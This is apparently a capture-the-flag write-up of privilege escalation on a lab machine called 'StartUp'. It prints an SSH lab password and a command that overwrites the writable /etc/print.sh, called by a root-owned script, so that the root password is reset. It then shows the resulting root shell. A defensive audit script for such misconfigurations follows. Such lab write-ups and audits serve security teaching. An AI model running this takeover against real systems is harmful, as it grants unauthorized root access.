StartUp
Privilege Escalation
- Using SSH Credentials to Login: lennie:c4ntg3t3n0ughsp1c3
lennie@startup ~$ id
uid=1002(lennie) gid=1002(lennie) groups=1002(lennie)
- There is a script in the lennie home directory, scripts/planner.sh. The script is owned by root.
- planner.sh calls /etc/print.sh, and we have read-write access on that script:
lennie@startup ~$ ls -l scripts/
total 8
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 Oct 7 08:43 startup_list.txt
lennie@startup ~$ cat scripts/planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
- Modifying /etc/print.sh to change the root password:
lennie@startup ~$ echo 'echo -e "password\npassword" | passwd root' > /etc/print.sh
- We can change the User from lennie ➜ root by using the Password: password
lennie@startup ~$ su -
Password:
root@startup:~$ id
uid=0(root) gid=0(root) groups=0(root)
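
A defender-side check for the misconfiguration used above, as an added example that is not part of the original write-up: it lists the absolute paths a privileged script references and flags any file or parent directory that is owned by an untrusted uid or is group/other-writable. The function names, the trusted-uid list and the constructed sample layout (including the 666 mode on print.sh) are assumptions.

```shell
# Added example, not from the original write-up. Audits a script that runs with
# elevated privileges: the script, every absolute path it references and each
# parent directory must have a trusted owner and no group/other write bit.

# Absolute paths mentioned in script $1 (a #! interpreter line included).
referenced_paths() {
    tr -cs 'A-Za-z0-9._/-' '\n' < "$1" | grep '^/' | sort -u
}

# Print a finding and return 0 if path $1 can be modified by a uid outside the
# space-separated list $2. Symlinks are followed (-L); missing paths are skipped.
is_tamperable() {
    entry=$(ls -ldnL -- "$1" 2>/dev/null) || return 1
    mode=${entry%% *}
    uid=$(printf '%s\n' "$entry" | awk '{print $3}')
    case " $2 " in
        *" $uid "*) ;;
        *) echo "$1: owner uid $uid is not trusted"; return 0 ;;
    esac
    case $mode in
        ?????w*|????????w*) echo "$1: group/other-writable ($mode)"; return 0 ;;
    esac
    return 1
}

# Audit script $1 against trusted uids $2 (default "0"); returns 1 on findings.
audit_script() {
    findings=$(
        { printf '%s\n' "$1"; referenced_paths "$1"; } |
        while IFS= read -r p; do printf '%s\n%s\n' "$p" "$(dirname -- "$p")"; done |
        sort -u |
        while IFS= read -r t; do is_tamperable "$t" "${2:-0}" || true; done
    )
    if [ -n "$findings" ]; then printf '%s\n' "$findings"; return 1; fi
    return 0
}

# Constructed sample under directory $1 mirroring the layout above. The 666
# mode on print.sh is an assumption; the write-up does not show its permissions.
build_sample() {
    mkdir -p "$1/scripts" "$1/etc"
    printf '%s\n' "echo \$LIST > $1/scripts/startup_list.txt" "$1/etc/print.sh" \
        > "$1/scripts/planner.sh"
    : > "$1/scripts/startup_list.txt"; : > "$1/etc/print.sh"
    chmod 755 "$1/scripts" "$1/etc" "$1/scripts/planner.sh"
    chmod 644 "$1/scripts/startup_list.txt"; chmod 666 "$1/etc/print.sh"
}

if [ $# -gt 0 ]; then audit_script "$@"; fi
```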